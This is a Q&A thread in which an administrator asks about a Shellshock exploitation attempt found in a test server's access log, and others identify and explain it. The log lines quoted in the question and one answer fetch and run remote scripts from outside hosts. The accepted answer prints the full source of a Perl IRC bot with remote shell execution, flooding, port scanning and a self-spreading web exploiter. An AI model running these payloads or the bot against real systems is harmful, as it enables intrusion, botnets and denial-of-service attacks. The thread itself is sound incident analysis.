# Is this an attack or something to be concerned about? Shellshock?

Tags: security, shell-script, webserver

Saw this in the `access.log` on my test server :

```
173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
```

None of the adresses is related to me or our IP-range (or anything else for that matter)
Was immediately thinking about the [Shellshock security bug](http://en.wikipedia.org/wiki/Shellshock_(software_bug)) / "bashdoor".

It actually looks like someone have tried to `curl` "something" down to the server, then executed that "something" and after that deleted "something" with `-rf`.

This is a pure test server, no harm is done (==no harm can be done besides reinstallation) - but the timing is very interesting. Have not seen anything like this before, as far as I recall.

Should I worry, eg be "interested"? Have anyone any idea about what this is?

Comment: That is someone exploiting the Shellshock bug. Can you determine what the perl script was doing? This is definitely worth you poking into. The URL it downloaded from is no longer useful, but http://213.5.67.223/ji exists and ought to be poked at. It seems to be an IRC script.

Comment: My antivirus says it's the [Perl/Shellbot.NAK.Gen trojan](http://www.virusradar.com/en/Perl_Shellbot.NAK.Gen/description).

Comment: We don’t even know whether the exploit succeeded, right?

Comment: Avast says http://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock is infected with Perl:Shellbot-N [Trj]

Answer (score 17, accepted):

That is someone exploiting the Shellshock bug. Can you determine what the perl script was doing? This is definitely worth you poking into. The second URL used returns a 404, but `http://213.5.67.223/ji` exists and might be the same thing, seeing as it is a perl script. It seems to be an IRC server of some sort, so connecting to your test server with an IRC client might prove interesting. EDIT: Comment corrected me, it's a client, so capable of snooping on you.

Also, check to see if the perl script is still running.

```
#!/usr/bin/perl
# ------------------------------------------------------------- #
#           LinuxNet perlbot            #
# ------------------------------------------------------------- #

#system("kill -9 `ps ax |grep /usr/sbin/apache2/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/apache3/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/atd |grep -v grep|awk '{print $1;}'`");

my $processo = '-';


my @titi = ("index.php?page=","main.php?page=");

my $goni = $titi[rand scalar @titi];

my $linas_max='7';
my $sleep='7';
my @adms=("x","JB" );
my @hostauth=("localhost","outlaw");
my @canais=("#gnu");
my $nick='|GNU|';
my $ircname ='GNU';
chop (my $realname = `uname -sr`);
$servidor='ircd.w3h.co.uk' unless $servidor;
my $porta='443';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/tmp");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 1;
   }
}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}

sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
       }
       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         } 
       }
    }
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4; 
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick".int rand(999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal ddosit");
       }
   }
}


sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
             my (@aberta, %porta_banner);
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");     
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); 
             }
           }
           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
         my $itime = time;
         my ($cur_time);
             $cur_time = time - $itime;
         while ($3>$cur_time){
             $cur_time = time - $itime;
         &tcpflooder("$1","$2","$3");
             }
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
           }
       if ($funcarg =~ /^version/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);           
        }
           if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
         srand;
         my $itime = time;
         my ($cur_time);
         my ($exploited);
         $boturl=$2;
             $cur_time = time - $itime;$exploited = 0;
        while($1>$cur_time){
            $cur_time = time - $itime;
            @urls=fetch();
            foreach $url (@urls) {
            $cur_time = time - $itime;
            my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;

            $url =$path."/$goni$boturl" ;




            $page = http_query($url);
            $exploited = $exploited + 1;
            }
        }
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
           }
           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
         my $itime = time;
         my ($cur_time);
             $cur_time = time - $itime;
         while ($2>$cur_time){
             $cur_time = time - $itime;
         my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
         close($socket);
             }
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
           }
           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
           }
           exit;
       }
  }
}

sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   } 

if ($case =~ /^refresh (.*)/) {
my $goni = $titi[rand scalar @titi];
 }

   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}

sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
  } 
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c == "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}

sub tcpflooder {
 my $itime = time;
 my ($cur_time);
 my ($ia,$pa,$proto,$j,$l,$t);
 $ia=inet_aton($_[0]);
 $pa=sockaddr_in($_[1],$ia);
 $ftime=$_[2];
 $proto=getprotobyname('tcp');
 $j=0;$l=0;
 $cur_time = time - $itime;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
 }
 $l=0;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  shutdown($t,2);
  $l++;
 }
}

sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $porta = 1; $porta <= 65000; $porta++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
       }
     }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}  
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}

# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(5)) * $n);

my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
        "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
        "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
        "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
        "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
        "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
        "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
        "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",      
        "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
        "vu","vn","ye","yu","cd","zm","zw","");
my @str;

foreach $dom  (@dominios)
{
    push (@str,"allinurl:%22".$dom."/".$goni."%22");
}

    my $query="www.google.com/search?q=";
    $query.=$str[(rand(scalar(@str)))];
    $query.="&num=$n&start=$s";


    my @lst=();
    my $page = http_query($query);
    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
    if ($1 !~ m/google|cache|translate/){
        push (@lst,$1);
    }
    }
    return (@lst);
}


sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;

    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
    local $SIG{ALRM} = sub { die "1";};
    alarm 10;
    my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
    print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
    my @r = <$sock>;
    $page="@r";
    alarm 0;
    close($sock);
    };    
    return $page;

}
```

Comment: It's actually an IRC **client**, not a server.

Comment: `ps -ax | grep perl` or `ps ax | grep perl`

Comment: Thank you! I wish I could upvote more. According to the log there was a new attempt earlier this morning (from another IP) and by using `ps -ef` I can see there is a `/usr/sbin/apache2 -k start` with the exact same timestamp :( So I guess the attack has been successfully. Have updated bash with `sudo apt-get update && sudo apt-get install --only-upgrade bash`

Comment: Its the following line in the `shell` routine that had me worried:

    my @resp=`$comando 2>&1 3>&1`;

No harm done as far as I can tell.

Answer (score 7):

The Shellshock vulnerability is used to download (using `wget`) and execute a malicious Perl script, this attack is very basic and requires both Perl and wget to be installed (assuming one of them isn't and you are sure there were no other cracking attempts, your server wasn't compromised).

The script itself is a basic script-kiddie IRC bot, once executed that crap connects to an IRC server and waits for commands, looks like it has Google searching capabilities in it, most likely to automatically search for vulnerable hosts and attempt to exploit them. Other than that you of course have the basic skiddie arsenal, which is HTTP flood, TCP and UDP flood and shell access (as the user who ran the script, which would be the user under which the HTTP server runs as).

Answer (score 1):

As mentioned by others already, this is a script-kiddie attempt to exploit the bash vulnerability to execute a perl script based IRC bot. If you have **bash updated**, and in addition, if you run apache under **chroot** like I do, you have nothing to worry about. I see several versions of this on my log (see below) at least every other day since 9/27...this is just a noise.

```
12.64.2d.static.xlhost.com - - [27/Sep/2014:12:36:34 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""        
12.64.2d.static.xlhost.com - - [29/Sep/2014:00:39:41 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""        
web21.qna.vengit.com - - [01/Oct/2014:04:52:24 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
```

Another variety of script (python script) execution attempt I just noticed today ... NOTE: google-traffic-analytics.com where the python script is downloaded has nothing to do w/ Google of course.

```
cm232.delta210.maxonline.com.sg - - [04/Oct/2014:01:45:38 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
localhost - - [04/Oct/2014:01:45:41 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
169.118.103.218.static.netvigator.com - - [04/Oct/2014:01:45:45 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
mm-2-192-57-86.dynamic.pppoe.mgts.by - - [04/Oct/2014:01:45:52 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
```